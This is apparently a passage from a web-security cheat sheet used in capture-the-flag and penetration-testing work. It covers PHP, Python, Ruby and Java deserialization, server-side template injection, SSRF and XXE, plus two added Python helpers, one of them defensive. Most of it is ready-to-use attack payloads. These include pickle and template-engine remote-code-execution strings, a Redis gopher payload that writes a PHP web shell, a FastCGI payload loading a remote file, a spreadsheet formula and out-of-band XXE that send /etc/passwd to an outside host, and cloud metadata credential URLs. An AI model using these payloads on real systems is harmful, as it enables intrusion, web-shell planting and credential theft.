- Array: a:size:{key definition; value definition; (repeat per element)}
- Object: O:strlen(class name):class name:object size:{s:strlen(property name):property name:property definition;(repeat per property)}
- Other
- C - custom object
- R - pointer reference
- Public / Private / Protected serialization
- For example, class name Kaibro, property name test
- If Public, serialized as: ...{s:4:"test";...}
- If Private, serialized as: ...{s:12:"%00Kaibro%00test"}
- If Protected, serialized as: ...{s:7:"%00*%00test";...}
- Private and Protected carry two extra NULL bytes
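Added example (not from the cheatsheet): a small Python emitter for the serialize() format described above, showing the visibility name mangling and the byte-counted lengths; PhpObject and the function names are chosen for this example, not PHP's own API.

```python
from dataclasses import dataclass, field
from typing import Any, List, Tuple
from urllib.parse import quote

# Constructed example (not the cheatsheet's code): a minimal emitter for PHP's
# serialize() format, to show how visibility mangles property names and why
# the s:N length must count bytes, NUL bytes included.


@dataclass
class PhpObject:
    """Hypothetical container: class name plus (property, visibility, value) triples."""
    cls: str
    props: List[Tuple[str, str, Any]] = field(default_factory=list)


def mangle_prop_name(cls: str, prop: str, visibility: str) -> str:
    """Property name exactly as PHP writes it into the serialized stream."""
    if visibility == "public":
        return prop
    if visibility == "protected":
        return "\0*\0" + prop            # "\0*\0" prefix: two extra NUL bytes
    if visibility == "private":
        return "\0" + cls + "\0" + prop  # "\0Class\0" prefix: two extra NUL bytes
    raise ValueError("unknown visibility: " + visibility)


def php_serialize(value: Any) -> str:
    """Serialize None/bool/int/str/list/dict/PhpObject like PHP's serialize()."""
    if value is None:
        return "N;"
    if isinstance(value, bool):          # must precede int: bool is an int subclass
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # PHP stores the byte length, so multibyte UTF-8 text counts bytes, not chars
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, (list, dict)):
        items = value.items() if isinstance(value, dict) else enumerate(value)
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in items)
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(mangle_prop_name(value.cls, name, vis)) + php_serialize(val)
            for name, vis, val in value.props
        )
        return 'O:%d:"%s":%d:{%s}' % (
            len(value.cls.encode("utf-8")), value.cls, len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def as_query_value(serialized: str) -> str:
    """URL-encode a serialized string so the NUL bytes survive as %00 in a query string."""
    return quote(serialized, safe="")
```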
- Example
<?php
class Kaibro {
    public $test = "ggininder";
    function __wakeup()
    {
        system("echo ".$this->test);
    }
}
$input = $_GET['str'];
$kb = unserialize($input);
- Input:
.php?str=O:6:"Kaibro":1:{s:4:"test";s:3:";id";}
- Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
- Example 2 - Private
<?php
class Kaibro {
    private $test = "ggininder";
    function __wakeup()
    {
        system("echo ".$this->test);
    }
}
$input = $_GET['str'];
$kb = unserialize($input);
- Input:
.php?str=O:6:"Kaibro":1:{s:12:"%00Kaibro%00test";s:3:";id";}
- Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
CVE-2016-7124
- Affected versions:
- PHP5 < 5.6.25
- PHP7 < 7.0.10
- When the declared number of object properties is larger than the real number, __wakeup is skipped
- Deserialization fails, but __destruct still runs
- HITCON 2016
- Small quirk
O:+4:"test":1:{s:1:"a";s:3:"aaa";}
O:4:"test":1:{s:1:"a";s:3:"aaa";}
- Both give the same result
- Fast Destruct
- Forces the object to be destructed
- Put the object into an Array and overwrite it with the same key to force __destruct()
Array('key1' => classA, 'key1' => classB)
- https://github.com/ambionics/phpggc#fast-destruct
- Example
- ASCII Strings
- With the S serialization format the string contents can be written in hex: s:5:"A<null_byte>B<cr><lf>"; => S:5:"A\00B\09\0D";
- Bypass WAF
- https://github.com/ambionics/phpggc#ascii-strings
- Example
- Balsn CTF 2020 - L5D
- 网鼎杯 2020 青龙组 - AreUSerialz
Phar:// deserialization
- A phar file stores user-defined metadata in serialized form
- Through the phar:// pseudo-protocol this achieves deserialization
- Commonly affected functions: file_get_contents(), file_exists(), is_dir(), ...
- When deserialization is triggered via phar, the file does not need the phar extension (any extension works)
- Payload generator
<?php
class TestObject { }
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$o = new TestObject();
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>
- php recognizes a phar by __HALT_COMPILER();?>
- Anything can be placed in the stub before it
- e.g. fake GIF header:
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
- trigger phar deserialization by zip
<?php
class FLAG{}
$obj = serialize(new FLAG());
$zip = new ZipArchive;
$res = $zip->open('test.zip', ZipArchive::CREATE);
$zip->add FromString('test.txt', 'meow');
$zip->setArchiveComment($obj);
$zip->close();
// trigger: phar://test.zip
- trigger phar deserialization by tar
<?php
//@unlink("trigger.tar");
class FLAG{}
$phar = new PharData("trigger.tar");
$phar["kaibro"] = "meow";
$obj = new FLAG();
$phar->setMetadata($obj);
// trigger: phar://trigger.tar
- Generic Gadget Chains
- bypass: phar:// cannot appear at the beginning
compress.zlib://, compress.bzip2://, ...
compress.zlib://phar://meow.phar/test.txt
php://filter/read=convert.base64-encode/resource=phar://meow.phar
- Example
Python Pickle
- dumps(): serializes an object into a string
- loads(): deserializes a string into an object
Example:
a.py:
import os
import cPickle
import sys
import base64
class Exploit(object):
def __reduce__(self):
return (os.system, ('id',))
shellcode = cPickle.dumps(Exploit())
print base64.b64encode(shellcode)
b.py:
import os
import cPickle
import sys
import base64
s = raw_input(":")
print cPickle.loads(base64.b64decode(s))
$ python a.py > tmp
$ cat tmp | python b.py
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)
- Supplement: NumPy CVE-2019-6446 RCE
- Affects NumPy <=1.16.0
- Uses pickle underneath
Ruby/Rails Deserialization
- BAh: base64 signature of Marshal serialized data
- secret_key_base
- Used by ActiveSupport::MessageVerifier / ActiveSupport::MessageEncryptor
- sign & encrypt cookies
- ActiveStorage deserialization
- Since Rails 5.2, it can be recovered from credentials.yml.enc and master.key
- Gadget chain
- Ruby 3.4 Universal RCE Deserialization Gadget Chain by Luke Jahnke (2024)
- Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects by Peter Stöckli (2024)
- Discovering Deserialization Gadget Chains in Rubyland by Alex Leahu (2024)
- Ruby Deserialization - Gadget on Rails by httpvoid (2022)
- Universal gadget for ruby 2.x-3.x by vakzz (2021)
- Universal RCE with Ruby YAML.load (versions > 2.7) by Etienne Stalmans (2021)
- PBCTF 2020 - R0bynotes (2020)
- ERB cannot be used; uses ActiveModel::AttributeMethods::ClassMethods::CodeGenerator instead
- Universal gadget for ruby 2.x by elttam (2018)
- ERB gadget chain
Ruby Marshal
# this one is not self-executing
# this one actually relies on rails invoking a method on the resulting object after the deserialization
erb = ERB.allocate
erb.instance_variable_set :@src, "`id`"
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result, "foo", ActiveSupport::Deprecation
hash = {depr => 'something'}
marshalled = Marshal.dump(hash)
print marshalled
- In ERB, when the result or run method is called, the string in @src is executed
- Common usage scenarios:
- With Marshal as the Cookie Serializer, if you have the secret_key you can forge the Cookie
- DeprecatedInstanceVariableProxy can also be used to call ERB's result for RCE
- When DeprecatedInstanceVariableProxy is unmarshalled and the rails session handles it, an unknown method triggers method_missing, which executes the passed-in ERB via @instance.__send__(@method)
- Cookie Serializer
- Before Rails 4.1 the Cookie Serializer was Marshal
- Since Rails 4.1, JSON is the default
Ruby/Rails YAML
- CVE-2013-0156
- In old Rails versions, an XML node can declare its own type; if set to yaml, it is parsed as YAML
- Deserializing !ruby/hash amounts to calling obj[key]=val on the object, i.e. the []= method
- The []= method of ActionDispatch::Routing::RouteSet::NamedRouteCollection happens to have a code path that evals: define_hash_access uses module_eval, and the selector inside comes from name
- Because it also calls the defaults method on value, OpenStruct can be used to build a method name => return value mapping, kept in @table
- Payload:
xml = %{ <?xml version="1.0" encoding="UTF-8"?> <bingo type='yaml'> ---| !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection 'test; sleep(10); test' : !ruby/object:OpenStruct table: :defaults: {} </bingo> }.strip
- CVE-2013-0333
- In Rails 2.3.x and 3.0.x, a text/json request could be converted to YAML and parsed by the Yaml backend, the default JSON backend in Rails 3.0.x
- The problem is convert_json_to_yaml, run before YAML.load, which does not check whether the input JSON is valid
- RCE is again possible through the module_eval in ActionController::Routing::RouteSet::NamedRouteCollection#define_hash_access
Java Deserialization
- Serialized data signature
ac ed 00 05 ...
rO0AB ... (Base64)
- Deserialization trigger points
readObject()
readExternal()
- ...
- JEP290
- New in Java 9, backported to 8u121, 7u13, 6u141
- Adds blacklist/whitelist mechanisms
- Builtin Filter
- The JDK includes a Builtin Filter (whitelist mechanism) in the RMI Registry and RMI Distributed Garbage Collector
- Only specific classes are allowed to be deserialized
- Many RMI payloads stop working (even when a gadget is on the classpath)
- Codebase
- Since JDK 6u45, 7u21, useCodebaseOnly defaults to true
- Forbids automatic loading of remote class files
- JNDI Injection
- In JDK 6u132, 7u122, 8u113, com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase default to false
- RMI no longer allows loading Reference classes from a remote Codebase by default
- Since JDK 11.0.1, 8u191, 7u201, 6u211, com.sun.jndi.ldap.object.trustURLCodebase defaults to false
- LDAP no longer allows loading Reference classes from a remote Codebase by default
- Newer JDK (8u191+)
- codebase cannot be used (trustURLCodebase=false)
- Possible attack paths
- Find an exploitable ObjectFactory
- e.g. on Tomcat, org.apache.naming.factory.BeanFactory + javax.el.ELProcessor
- Deserialize via javaSerializedData
- Tool
- ysoserial
- URLDNS: depends on no extra library; can be used with dnslog for verification
- CommonCollections 1~7: gadget chains for the various Commons Collections versions
- ...
- BaRMIe
- For Java RMI (enumerating, attacking)
- remote-method-guesser
- RMI vulnerability scanner
- marshalsec
- SerializationDumper
- Analyzes a Serialization Stream: Magic header, serialVersionUID, newHandle, etc.
- gadgetinspector
- Bytecode Analyzer
- Finds gadget chains
- GadgetProbe
- Uses a wordlist with DNS callbacks to determine which libraries and classes the target environment uses
- JNDI-Injection-Bypass
- Java-Deserialization-Cheat-Sheet
- Example
- 0CTF 2022 - hessian-onlyjdk
- hessian2 deserialization
- 0CTF 2022 - 3rm1
- Balsn CTF 2021 - 4pple Music
- 0CTF 2021 Qual - 2rm1
- 0CTF 2019 Final - hotel booking system
- TrendMicro CTF 2018 Qual - Forensics 300
- TrendMicro CTF 2019 Qual - Forensics 300
- TrendMicro CTF 2019 Final - RMIart
.NET Deserialization
- Tool
- In asp.net, ViewState stores data in serialized form
- With the machinekey, or when the viewstate is not encrypted/validated, RCE may be possible
- Example
SSTI
Server-Side Template Injection
Testing
{{ 7*'7' }}
- Twig: 49
- Jinja2: 7777777
<%= 7*7 %>
- Ruby ERB: 49
Flask/Jinja2
- Dump all used classes
{{ ''.__class__.__mro__[2].__subclasses__() }}
- Read File
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
- Write File
{{''.__class__.__mro__[2].__subclasses__()[40]('/var/www/app/a.txt', 'w').write('Kaibro Yo!')}}
- RCE
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
- evil config
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
- load config
{{ config['RUNCMD']('cat flag',shell=True) }}
- RCE (another way)
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('ls').read()}}
- Python3 RCE
{% for c in [].__class__.__base__.__subclasses__() %}
  {% if c.__name__ == 'catch_warnings' %}
    {% for b in c.__init__.__globals__.values() %}
      {% if b.__class__ == {}.__class__ %}
        {% if 'eval' in b.keys() %}
          {{ b['eval']('__import__("os").popen("id").read()') }}
        {% endif %}
      {% endif %}
    {% endfor %}
  {% endif %}
{% endfor %}
- Square brackets filtered
- __getitem__
{{''.__class__.__mro__.__getitem__(2)}}
{{''.__class__.__mro__[2]}}
- {{ or }} filtered
- Use {%%}
- Send the execution result out of band
- . filtered
{{''.__class__}}
{{''['__class__']}}
{{''|attr('__class__')}}
- Keyword filtered
- Use the \xff form to bypass: {{''["\x5f\x5fclass\x5f\x5f"]}}
- Bypass via request
{{''.__class__}}
{{''[request.args.kaibro]}}&kaibro=__class__
Twig / Symfony
- RCE
{{['id']|map('passthru')}}
{{['id']|filter('system')}}
{{app.request.query.filter(0,'curl${IFS}kaibro.tw',1024,{'options':'system'})}}
{{_self.env.setCache("ftp://attacker.net:21")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
- Read file
{{'/etc/passwd'|file_excerpt(30)}}
- Version
{{constant('Twig\\Environment::VERSION')}}
thymeleaf
- Java
- Common injection scenarios: https://github.com/veracode-research/spring-view-manipulation/
- Some payload
__${T(java.lang.Runtime).getRuntime().availableProcessors()}__::..x
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
__*{new.java.lang.String(new.java.lang.ProcessBuilder('ls', '-al').start().getInputStream().readAllBytes())}__::.
- Restrictions in newer versions
- Example
- WCTF 2020 - thymeleaf
- DDCTF 2020 - Easy Web
- Codegate 2023 - AI
- from Pew:
$__|{springRequestContext.getClass().forName("org.yaml.snakeyaml.Yaml").newInstance().load(thymeleafRequestContext.httpServletRequest.getParameter("a"))}|__(xx=id)?a=!!org.springframework.context.support.FileSystemXmlApplicationContext ["https://thegrandpewd.pythonanywhere.com/pwn.bean"]
- DEVCORE Wargame 2024 - Spring
- thymeleaf 3.0.15:
__*{new.java.lang.String(new.java.lang.ProcessBuilder('/readflag', 'give','me','the','flag').start().getInputStream().readAllBytes())}__::.
Freemarker
${"freemarker.template.utility.Execute"?new()("calc")}
${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
<#assign value="freemarker.template.utility.Execute"?new()>${value("Calc")}
<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","Calc").start()}
Golang
- module
- Testing
{{87}}
{{.}}
{{"meow"|print}}
{{"<script>alert(/xss/)</script>"}}
{{ .MyFunc "arg1" "arg2" }}
- This calls a MyFunc function defined by the application
- ...
- Echo gadget
{{.File "/etc/passwd"}}
{{.Echo.Filesystem.Open "/etc/passwd"}}
{{.Echo.Static "/meow" "/"}}
- Example:
- ACSC CTF 2023 - easyssti
{{ $x := .Echo.Filesystem.Open "/flag" }} {{ $x.Seek 1 0 }} {{ .Stream 200 "text/plain" $x }}
(by @nyancat)
{{ (.Echo.Filesystem.Open "/flag").Read (.Get "template") }} {{ .Get "template" }}
(by @maple3142)
{{ $f := .Echo.Filesystem.Open "/flag" }} {{ $buf := .Get "template" }} {{ $f.Read $buf }} {{ $buf }}
(by @Ocean)
AngularJS
- Sandbox removed since v1.6
- Payload
{{ 7*7 }}
=> 49
{{ this }}
{{ this.toString() }}
{{ constructor.toString() }}
{{ constructor.constructor('alert(1)')() }}
- v1.0.1-v1.1.5
{{ a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')() }}
{{ toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor) }}
- v1.2.19-v1.2.23
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
- v1.2.24-v1.2.29
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
- v1.3.20
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
- v1.4.0-v1.4.9
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
- v1.5.0-v1.5.8
{{ [].pop.constructor('alert(1)')() }}
- v1.6.0-1.6.6
Vue.js
{{constructor.constructor('alert(1)')()}}
- https://github.com/dotboris/vuejs-serverside-template-xss
Python
- %
- Entering %(password)s prints the password:
userdata = {"user" : "kaibro", "password" : "ggininder" }
passwd = raw_input("Password: ")
if passwd != userdata["password"]:
    print ("Password " + passwd + " is wrong for user %(user)s") % userdata
- f-string
- python 3.6
- example
a="gg"
b=f"{a} ininder"
>>> gg ininder
- example2
f"{os.system('ls')}"
Tool
http://blog.portswigger.net/2015/08/server-side-template-injection.html
SSRF
Find SSRF
- Webhook
- Example: https://hackerone.com/reports/56828
- From XXE to SSRF
<!ENTITY xxe SYSTEM "http://192.168.1.1/secret">
- PDF generator / HTML renderer
- Insert JS, Iframe, ...
- e.g.
<iframe src="file:///C:/Windows/System32/drivers/etc/hosts">
- Open Graph
<meta property="og:image" content="http://kaibro.tw/ssrf">
- SQL Injection
- e.g. Oracle:
?id=1 union select 1,2,UTL_HTTP.request('http://10.0.0.1/secret') from dual
- SVG parsing
- xlink:
<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="http://<EXAMPLE_SERVER>/image.jpeg" /></svg>
- More payload: https://github.com/cujanovic/SSRF-Testing/tree/master/svg
- Bug Bounty Example: https://hackerone.com/reports/223203
- ImageTragick
- CVE-2016-3718
push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context
- HTTPoxy
- CGI automatically copies the Proxy header into the HTTP_Proxy environment variable
Proxy: http://evil.com:12345/
- XSLT
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:include href="http://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
- FFMPEG
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://yourserver.com/anything
#EXT-X-ENDLIST
Bypass 127.0.0.1
127.0.0.1
127.00000.00000.0001
localhost
127.0.1
127.1
0.0.0.0
0.0
0
::1
::127.0.0.1
::ffff:127.0.0.1
::1%1
127.12.34.56 (127.0.0.1/8)
127.0.0.1.xip.io
http://2130706433 (decimal)
http://0x7f000001
http://017700000001
http://0x7f.0x0.0x0.0x1
http://0177.0.0.1
http://0177.01.01.01
http://0x7f.1
http://[::]
Bypass using enclosed alphanumerics (e.g. Ⓐ Ⓑ Ⓒ Ⓓ)
http://ⓀⒶⒾⒷⓇⓄ.ⓉⓌ
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
Internal IPs
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
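Added defender-side example (not from the cheatsheet): canonicalizing a URL's host the way inet_aton-style parsers do, so that the 127.0.0.1 spellings above (127.1, 0x7f.1, 017700000001, 2130706433, ::ffff:127.0.0.1, ...) collapse to one address before the internal-range check; function names are chosen here, and the IPv6 zone-id and IPv4-mapped handling goes slightly beyond the list.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed defender-side example (not the cheatsheet's code): reduce every
# spelling of a loopback/internal host listed above to one canonical address
# before deciding whether an outbound request may be made. Function names are
# chosen for this example; inet_aton's shorthand rules are reimplemented here
# because ipaddress.ip_address() accepts only the strict dotted-quad form.


def _legacy_part(part: str) -> int:
    """One dotted component as inet_aton reads it: 0x.. hex, 0.. octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]*", part):
        return int(part, 8)
    if re.fullmatch(r"[1-9][0-9]*", part):
        return int(part, 10)
    raise ValueError("not numeric: %r" % part)


def ipv4_from_legacy(host: str):
    """IPv4Address for inet_aton-style shorthand, or None if host is not numeric.

    1 part   a        -> 32-bit value          2130706433, 0x7f000001, 017700000001
    2 parts  a.b      -> a<<24 | b (24 bits)   127.1, 0x7f.1
    3 parts  a.b.c    -> a<<24 | b<<16 | c     127.0.1
    4 parts  a.b.c.d                           0177.0.0.1, 0x7f.0x0.0x0.0x1
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_legacy_part(p) for p in parts]
    except ValueError:
        return None
    value = 0
    for n, shift in zip(nums[:-1], (24, 16, 8)):
        if n > 255:
            return None
        value |= n << shift
    last_bits = 32 - 8 * (len(nums) - 1)
    if nums[-1] >= 1 << last_bits:
        return None
    return ipaddress.IPv4Address(value | nums[-1])


def canonical_address(url: str):
    """The URL host as an ip_address object without doing DNS, or None for a host name."""
    host = urlsplit(url).hostname
    if host is None:
        return None
    host = host.split("%", 1)[0]              # strip an IPv6 zone id such as ::1%1
    try:
        addr = ipaddress.ip_address(host)     # strict forms, incl. ::1, ::, ::ffff:127.0.0.1
    except ValueError:
        addr = ipv4_from_legacy(host)
        if addr is None:
            return None
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped               # ::ffff:127.0.0.1 -> 127.0.0.1
    return addr


def classify_target(url: str) -> str:
    """'internal' for loopback/private/link-local/unspecified/reserved targets,
    'public' for a literal public address, 'needs-dns' for a host name
    (localhost, 127.0.0.1.xip.io, ...) that must be resolved and re-checked."""
    addr = canonical_address(url)
    if addr is None:
        return "needs-dns"
    if (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_reserved or addr.is_multicast):
        return "internal"
    return "public"
```

Resolving a host name and then re-running classify_target on the resolved address (for every address returned, and again after each redirect) closes the 302 redirect and DNS-based bypasses described in the following sections.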
XSPA
- port scan
127.0.0.1:80 => OK
127.0.0.1:87 => Timeout
127.0.0.1:9487 => Timeout
302 Redirect Bypass
- Used to bypass protocol restrictions
- On the first SSRF the site checks and filters the URL
- After the 302 redirect, the second SSRF is not checked
Local exploitation
- file protocol
file:///etc/passwd
file:///proc/self/cmdline
- see what it is running
file:///proc/self/exe
- dump binary
file:///proc/self/environ
- read environment variables
curl file://google.com/etc/passwd
- fixed in newer versions
- tested working with libcurl 7.47
- Java seems able to list directories (netdoc works too)
- Perl/Ruby open Command Injection
- Libreoffice CVE-2018-6871
- WEBSERVICE can be used to read local files, e.g. /etc/passwd
- The content read can be sent out over http
=COM.MICROSOFT.WEBSERVICE("http://kaibro.tw/"&COM.MICROSOFT.WEBSERVICE("/etc/passwd"))
- e.g. DCTF 2018 final, FBCTF 2019
- Example Payload: Link
Remote exploitation
- Gopher
- Can forge arbitrary TCP, very handy
gopher://127.0.0.1:5278/xGG%0d%0aININDER
- Common examples
- Struts2
- S2-016
action:, redirect:, redirectAction:
index.do?redirect:${new java.lang.ProcessBuilder('id').start()}
- ElasticSearch
- default port: 9200
- Redis
- default port: 6379
- Write a shell with SAVE
FLUSHALL
SET myshell "<?php system($_GET['cmd']) ?>"
CONFIG SET DIR /www
CONFIG SET DBFILENAME shell.php
SAVE
QUIT
- URLencoded payload:
gopher://127.0.0.1:6379/_FLUSHALL%0D%0ASET%20myshell%20%22%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%0D%0ACONFIG%20SET%20DIR%20%2fwww%2f%0D%0ACONFIG%20SET%20DBFILENAME%20shell.php%0D%0ASAVE%0D%0AQUIT
- FastCGI
- default port: 9000
- example
- Discuz Pwn
- 302.php:
<?php header( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%8b%00%00%0E%03REQUEST_METHODGET%0F%0FSCRIPT_FILENAME/www//index.php%0F%16PHP_ADMIN_VALUEallow_url_include%20=%20On%09%26PHP_VALUEauto_prepend_file%20=%20http://kaibro.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );
- x:
<?php system($_GET['cmd']); ?>
- visit:
/forum.php?mod=ajax&action=downremoteimg&message=[img]http://kaibro.tw/302.php?.jpg[/img]
- MySQL
- SSRF is possible when there is no password authentication
- MySQL Client/Server interaction has two main phases
- Connection Phase
- Command Phase
gopher://127.0.0.1:3306/_<PAYLOAD>
- Tool: https://github.com/undefinedd/extract0r-
- MSSQL
- Tomcat
- Deploy a war through tomcat manager
- Credentials are needed first; read them from tomcat-users.xml, or try the default password
- Tool: https://github.com/pimps/gopher-tomcat-deployer
- e.g. CTFZone 2019 qual - Catcontrol
- Docker
- Unauthenticated Remote API access
- Start a container, mount /root/, write an ssh key
- Write a crontab to get a reverse shell
docker -H tcp://ip xxxx
- ImageMagick - CVE-2016-3718
- Can send HTTP or FTP requests
- payload: ssrf.mvg
push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context
$ convert ssrf.mvg out.png
Metadata
AWS
- http://169.254.169.254/latest/user-data
- http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
- http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
- http://169.254.169.254/latest/meta-data/ami-id
- http://169.254.169.254/latest/meta-data/reservation-id
- http://169.254.169.254/latest/meta-data/hostname
- http://169.254.169.254/latest/meta-data/public-keys/
- http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
- http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
Google Cloud
- http://metadata.google.internal/computeMetadata/v1/
- http://metadata.google.internal/computeMetadata/v1beta1/
- No header is needed for the request
- http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
- Access Token
- Check the scope of access token:
curl "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=XXXXXXXXXXXXXXXXXXX"
- Call the Google api with token:
curl "https://www.googleapis.com/storage/v1/b?project=<your_project_id>" -H "Authorization: Bearer ya29..."
(list buckets)
- http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json
- SSH public key
- http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json
- kub-env
- http://metadata.google.internal/computeMetadata/v1beta1/project/project-id
- http://metadata.google.internal/computeMetadata/v1beta1/instance/name
- http://metadata.google.internal/computeMetadata/v1beta1/instance/hostname
- http://metadata.google.internal/computeMetadata/v1beta1/instance/zone
Digital Ocean
- http://169.254.169.254/metadata/v1.json
- http://169.254.169.254/metadata/v1/
- http://169.254.169.254/metadata/v1/id
- http://169.254.169.254/metadata/v1/user-data
- http://169.254.169.254/metadata/v1/hostname
- http://169.254.169.254/metadata/v1/region
- http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
Azure
- http://169.254.169.254/metadata/v1/maintenance
- http://169.254.169.254/metadata/instance?api-version=2020-06-01
- Requires the Metadata: true header
Alibaba
- http://100.100.100.200/latest/meta-data/
- http://100.100.100.200/latest/meta-data/instance-id
- http://100.100.100.200/latest/meta-data/image-id
CRLF injection
SMTP
SECCON 2017 SqlSRF:
127.0.0.1 %0D%0AHELO sqlsrf.pwn.seccon.jp%0D%0AMAIL FROM%3A %3Ckaibrotw%40gmail.com%3E%0D%0ARCPT TO%3A %3Croot%40localhost%3E%0D%0ADATA%0D%0ASubject%3A give me flag%0D%0Agive me flag%0D%0A.%0D%0AQUIT%0D%0A:25/
FingerPrint
- dict
dict://evil.com:5566
$ nc -vl 5566
Listening on [0.0.0.0] (family 0, port 5278)
Connection from [x.x.x.x] port 5566 [tcp/*] accepted (family 2, sport 40790)
CLIENT libcurl 7.35.0
-> libcurl version
- sftp
sftp://evil.com:5566
$ nc -vl 5566
Listening on [0.0.0.0] (family 0, port 5278)
Connection from [x.x.x.x] port 5278 [tcp/*] accepted (family 2, sport 40810)
SSH-2.0-libssh2_1.4.2
-> ssh version
- Content-Length
- Send an oversized Content-Length
- If the connection hangs, that indicates an HTTP service on the other end
UDP
- tftp
tftp://evil.com:5566/TEST
- syslog
SSRF Bible:
https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit
Testing Payload:
https://github.com/cujanovic/SSRF-Testing
XXE
Internal entity
<!DOCTYPE kaibro[
<!ENTITY param "hello">
]>
<root>&param;</root>
External entity
- Since libxml 2.9.0, external entities are not resolved by default
- simplexml_load_file(): older versions resolved entities by default; newer versions need LIBXML_NOENT as the third argument
- SimpleXMLElement is a class in PHP
<!DOCTYPE kaibro[
<!ENTITY xxe SYSTEM "http://kaibro.tw/xxe.txt">
]>
<root>&xxe;</root>
<!DOCTYPE kaibro[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
XXE on Windows
<!DOCTYPE kaibro[
<!ENTITY xxe SYSTEM "\\12.34.56.78">
]>
<root>&xxe;</root>
Parameter entity
<!DOCTYPE kaibro[
<!ENTITY % remote SYSTEM "http://kaibro.tw/xxe.dtd">
%remote;
]>
<root>&b;</root>
xxe.dtd: <!ENTITY b SYSTEM "file:///etc/passwd">
Out of Band (OOB) XXE
- Blind, nothing is echoed back
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/xxe/test.php">
<!ENTITY % remote SYSTEM "http://kaibro.tw/xxe.dtd">
%remote;
%all;
%send;
]>
xxe.dtd:
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://kaibro.tw/?a=%file;'>">
CDATA
When the file contains special characters, wrapping it in CDATA gets around the read failure
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://kaibro.tw/cdata.dtd">
%dtd;
%all;
]>
<root>&f;</root>
cdata.dtd:
